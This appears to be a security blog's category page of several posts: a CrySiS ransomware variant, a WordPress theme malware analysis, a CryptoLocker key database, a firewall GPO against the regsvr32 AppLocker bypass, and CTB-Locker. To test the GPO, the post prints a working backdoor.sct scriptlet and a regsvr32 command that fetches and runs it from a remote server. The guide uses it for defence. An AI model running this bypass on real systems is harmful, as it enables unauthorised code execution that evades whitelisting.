Category: Security

CrySiS Reborn, Not Decryptable: [stopper@india.com].wallet

width=600
Break-fix call on a CrySiS Ransomware infection.  It’s actually not CrySiS, but a fork of it, which is not decryptable at this time.  CrySiS shut down its operation a month or so ago and dumped the master encryption key so victims could decrypt their files.  Not so much with this variant.
After infection, it drops a JPEG file in the user’s folder C:UsersVictimINFORMATION HOoW TO DECRYYPT FILES.jpg.
It encrypts files and renames them with .[stopper@india.com].wallet
width=584
It drops a file on the desktop named STOPPER.txt:

Attentiion!!!
All your filess are encrypted!
To decrypt your files, please contact us by email:stopper@india.com

The method of infection was from unauthorized access (brute-force) RDP connection.
It also drops AnonCrpt.exe on the desktop, 274KB file size;  A quick analysis from VirusTotal shows the results below:

VirusTotal detection results from AnonCrpt.exe

As mentioned earlier, there is not a way to decrypt this currently.
Stay safe.

Part 1: Analysis of a WordPress Malware

I had some time at lunch to kill, so I decided to see how Malware techniques were improving in the land of WordPress and free premium theme download sites.

Enter the Darknet.

A simple Google search got me a theme ZIP file pretty quickly.  Now, it was time to see what malicious happenings this thing would cause.
Unpacked, here’s the structure of the ZIP file.

.
├── functions.php
├── home.php
├── images
│   ├── arrow.png
│   ├── bg-pattern.png
│   ├── bg.png
│   ├── blockquote.png
│   ├── blue
│   │   ├── gradient.png
│   │   ├── logo.png
│   │   ├── logo-texture.png
│   │   ├── logo-vert-left.png
│   │   └── logo-vert-right.png
│   ├── favicon.ico
│   ├── footer-twitter.png
│   ├── footer-widgets.png
│   ├── gradient.png
│   ├── green
│   │   ├── gradient.png
│   │   ├── logo.png
│   │   ├── logo-texture.png
│   │   ├── logo-vert-left.png
│   │   └── logo-vert-right.png
│   ├── icon-dot.png
│   ├── list-after-post.png
│   ├── list.png
│   ├── logo.png
│   ├── logo-texture.png
│   ├── logo-vert-left.png
│   ├── logo-vert-right.png
│   ├── red
│   │   ├── gradient.png
│   │   ├── logo.png
│   │   ├── logo-texture.png
│   │   ├── logo-vert-left.png
│   │   └── logo-vert-right.png
│   ├── rss.png
│   ├── social-icons.png
│   └── twitter-nav.png
├── page_landing.php
├── page_landing2.php
├── README.txt
├── screenshot.png
└── style.css

Right off the bat, page_landing2.php sticks out to me. Let’s take a look.



Oh. Would you look at that fun. Time to see what this is doing.
First, I don’t like trying to read the garbled code, so I “prettify” it.


Ok, so let’s decode the above to make it readable.

There are a few interesting pieces here.



These interest me because they are making a call to a website to get additional payload/scripts. Let’s see what they are. =)

The first one, pastebin link, shows me this garbled shit. What I really care about is the compressed base64 at the end.


So, now I look to deobfuscating the compressed/base64 garbage… Here’s part of the file, my screencapture died when my computer automatically locked; [FIXME]

NOTE: Click on the image for a higher resolution. It’s like 62k pixels tall, lol.
 
What I’m interested in is the top of this file.


So again, uncompressing the base64 encoding of that gives me the following file.


Going back for a minute the the previous garbled shit $plsym variable which contains the compressed/base64 is decompressed and unencoded and saved as a perl file.


At this point, I have everything I need to begin to follow this even deeper into the dark underworld. There are a few domains (which I didn’t highlight in this article, but you can find them in the screenshots) and some passwords.

Stay tuned… in the next update, I show you what happens when I infiltrate their command servers. Much fun!

CryptoLocker Database Search

I found the database dump of the CryptoLocker release from May 30, 2015 by the ransomware’s author.  I decided to put it into a database and make a lame front-end for it to be queried against by either the bitcoin address or the public RSA key from the infected computer.
Hope it helps someone out there.
https://techish.net/locker/

Hi,
I am the author of the Locker ransomware and I’m very sorry about that has happened. It was never my
intention to release this.
I uploaded the database to mega.co.nz containing bitcoin address, public key, private key as CSV.
This is a dump of the complete database and most of the keys weren’t even used.
All distribution of new keys has been stopped.
https://mega.co.nz/#!W85whbSb!kAb-5VS1Gf20zYziUOgMOaYWDsI87o4QHJBqJiOW6Z4
Automatic decryption will start on 2nd of june at midnight.
@devs, as you might be aware the private key is used in the RSACryptoServiceProvider class .net and
files are encrypted with AES-256 bit using the RijndaelManaged class.
This is the structure of the encrypted files:
– 32 bit integer, header length
– byte array, header (length is previous int)
*decrypt byte array using RSA & private key.
Decrypted byte array contains:
– 32 bit integer, IV length
– byte array, IV (length is in previous int)
– 32 bit integer, key length
– byte array, Key (length is in previous int)
– rest of the data is the actual file which can be decrypted using Rijndaelmanaged and the IV and Key
Again sorry for all the trouble.
Poka BrightMinds
~ V

GPO to block regsvr32 AppLocker Bypass Vulnerability

A recently discovered method of bypassing AppLocker by using regsvr32.exe, poses a threat to users on Windows 7, 8/8.1, and 10 (Professional or Enterprise editions).  To work around this issue and prevent regsvr32 from accessing remote resources, you can block regsvr32.exe in the Windows Firewall.  Taking it a step further, I have added a new GPO to block this domain-wide within my company. Here are some of my notes.

Create a GPO and Edit

In Group Policy Management, I created a new GPO and named it Firewall:  Block regsvr32 then I edited it.
Navigate to Computer Configuration > Policies > Windows Settings > Security Settings > Windows Firewall with Advanced Security
Add a rule to both Inbound Rules and Outbound Rules to block regsvr32.exe.

2016-04-27_111611
Create a new inbound rule to block regsvr32.exe

Inbound Rule Wizard

2016-04-27_111627
Choose Program as the type of rule to create and click Next >

2016-04-27_111642
Use C:windowssystem32regsvr32.exe as the path; you can either type it in or click Browse… to navigate to it and choose.

2016-04-27_111651
Choose Block as the action and click Next >

2016-04-27_111659
Apply it to all network locations.

2016-04-27_111717
Give the rule a name and possibly a description.

2016-04-27_111733
Rule to block is now listed in Inbound Rules

Outbound Rule Wizard

Repeat the steps from the Inbound Rule Wizard, but as a new Outbound Rules rule.

Link GPO

Now that the GPO is created, you can link the policy within your domain as usual.

Testing

To test that the rule is effective, run gpupdate /force on your system to force an immediate security group policy application.
I’ll leave the following backdoor.sct on my server if you want to test against it, but you can also save the following to a file and save it (doesn’t have to be extension .SCT, can be anything…).
backdoor.sct

<?XML version=1.0?>
<scriptlet>
<registration
 progid=Empire
 classid={F0001111-0000-0000-0000-0000FEEDACDC} >
 <!-- Proof Of Concept - Casey Smith @subTee -->
 <script language=JScript>
 <![CDATA[
 var r = new ActiveXObject(WScript.Shell).Run(cmd.exe);
 ]]>
</script>
</registration>
</scriptlet>

Command to run:

regsvr32 /s /n /u /i:https://techish.net/pub/backdoor.sct scrobj.dll

If a command window opens, the GPO created is not blocking it (for one reason or another; double-check your work).

Crypto Ransomware CTB-Locker (Critroni.A)

Move over CryptoLocker, there’s a newer and meaner kid on the block.
CTB-Locker, or Curve-Tor-Bitcoin Locker, makes use of the Tor ((Tor is free software and an open network that helps you defend against traffic analysis, a form of network surveillance that threatens personal freedom and privacy, confidential business activities and relationships, and state security.)) network to maintain anonymity, making tracing the culprits more difficult and detected infections are on the rise since June of this year.
This strain of ransomware also compresses the files it encrypts, using Zlib, and employs ECDH (Elliptic Curve Diffie-Hellman ((Elliptic curve Diffie–Hellman (ECDH) is an anonymous key agreement protocol that allows two parties, each having an elliptic curve public–private key pair, to establish a shared secret over an insecure channel.[1][2][3] This shared secret may be directly used as a key, or better yet, to derive another key which can then be used to encrypt subsequent communications using a symmetric key cipher. It is a variant of the Diffie–Hellman protocol using elliptic curve cryptography.))) encryption, another unusual feature. The ransomeware’s author insist that decryption of files without payment is impossible due to RSA-3072 encryption
Like Cryptolocker, CTB-Locker/Critroni generates a public and private key pair for every infected system. The public key is stored on the infected computer and given to the victim, who is then asked to pay a ransom in Bitcoin in order to recover the files.
The private key, which is used to decrypt the files, is stored on a remote command-and-control server that, in the case of Critroni, can only be accessed over the Tor anonymity network. This is a precaution that the creator has taken in order to make it difficult for law enforcement agencies or security researchers to identify and shut down the server.
Critroni was designed to complete the file encryption operation locally before connecting to the command-and-control server. This also makes it hard for network security products to detect it early and block it by analyzing traffic.
Again, similar to CryptoLocker, there is a 72 hour window of “opportunity” to pay up and get a decryption key.
A more in-depth analysis and walkthrough of this new crypto ransomware can be viewed on the Kafeine’s, a French security researcher, blog.
Touted as the CryptoLocker replacement, this is just another reminder call to make sure you have a good backup strategy.